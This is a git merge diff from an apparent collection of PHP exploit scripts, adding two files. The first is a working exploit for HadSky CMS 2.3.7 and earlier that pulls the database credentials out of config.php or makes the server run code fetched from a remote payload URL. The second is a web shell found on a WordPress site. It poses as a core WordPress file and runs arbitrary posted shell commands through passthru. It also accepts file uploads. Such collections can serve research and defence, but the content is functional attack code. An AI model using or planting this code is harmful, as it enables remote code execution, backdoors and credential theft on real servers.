Merge branch 'master' of github.com:mattiasgeniar/php-exploit-scripts

* 'master' of github.com:mattiasgeniar/php-exploit-scripts:
  fix bad html comments syntax
  fix exp
  fix
  fix
  fix exp
  add exp
  my collection

Author: mattiasgeniar

exp4php/hadsky.php

@@ -0,0 +1,65 @@
+<?php
+/**
+Author:l34rner
+Desc:HadSky CMS <=2.3.7 remote code excution && file disclosure vulnerability
+
+**/
+$die=<<<str
+
+usage:php $argv[0] target [payloadURL]
+
+Eg: php $argv[0] http://www.google.com/HadSky/ [http://yourServer/payload.txt]
+
+if you dont set the payloadURL,This exp will read the site`s config.php by default.
+
+str;
+if($argc<2 || $argc>3)
+{
+	die($die);
+}
+$poc='?c=page&filename=./puyuetian/mysql/config.php';
+$ch=curl_init();
+if(!$ch)
+{
+	die("Dont support curl!");
+}
+
+if($argc==2)
+{
+	$url=$argv[1].$poc;
+	curl_setopt($ch, CURLOPT_URL, $url);
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($ch, CURLOPT_HEADER, 0);
+	$out=curl_exec($ch);
+	$start=strpos($out,'$_G[\'MYSQL\']');	
+	$end=strpos($out,'$_G[\'MYSQL\'][\'CHARSET\']');
+	$output=substr($out,$start,$end-$start);
+	if($output)
+	{
+		echo "\r\noh yeah,got the result\r\n\r\n";
+		echo $output;
+	}
+	else
+	{
+		echo "oops,seems the config file has been renamed!";
+	}
+}
+if($argc==3)
+{
+	$url=$argv[1].'?c=page&filename='.$argv[2];
+	curl_setopt($ch, CURLOPT_URL, $url);
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($ch, CURLOPT_HEADER, 0);
+	$out=curl_exec($ch);
+	$error='未找到的模板文件！';
+	$errorpos=strpos($out, $error);
+	if($errorpos===false)
+	{
+		echo "Done,ur code has been  excuted successfully!";
+	}
+	else
+	{
+		echo "Failed!";
+	}
+}
+?>

found_on_wordpress/class-ftp-inc.php

@@ -0,0 +1,67 @@
+<!-- Front to the WordPress application. This file doesn't do anything, but loads -->
+<!-- wp-blog-header.php which does and tells WordPress to load the theme.         -->
+<html>
+<head>
+<title>WordPress</title>
+</head>
+<BODY bgcolor="#000000">
+<!-- ngatur direktori -->
+<? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?>
+<table>
+<tr><td bgcolor=#cccccc>
+
+<!-- eksekusi command dengan passthru -->
+
+<?
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="uname -ar ; pwd ; id ; ls -la ;"; }
+echo "<b>";
+echo "<div align=left><textarea name=report cols=70 rows=15>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr></table>
+<!-- upload file -->
+<?
+if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
+{
+copy($HTTP_POST_FILES["filenyo"][tmp_name],
+$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
+or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
+<div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>");
+}
+?>
+<table width=100% cellpadding=0 cellspacing=0 >
+<tr><td>
+
+<!-- form eksekusi command -->
+
+<?
+echo "<form name=command method=post>";
+echo "<font face=Verdana size=1 color=red>";
+echo "<b>[CmD ]</b><input type=text name=cmd size=33>  ";
+if ((!$_POST['dir']) OR ($_POST['dir']==""))
+{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
+echo "  <input type=submit name=submit value=\"0k\">";
+echo "</font>";
+echo "</form>";
+?>
+</td></tr></table>
+<table width=100% cellpadding=0 cellspacing=0 >
+
+<!-- form upload -->
+
+<?
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo "<font face=Verdana size=1 color=red>";
+echo "<b> [EcHo]</b>";
+echo "<input type=file name=filenyo size=70> ";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=\"0k\">";
+echo "</font>";
+echo "</form>";
+?>
+</td></tr></table>
+</html>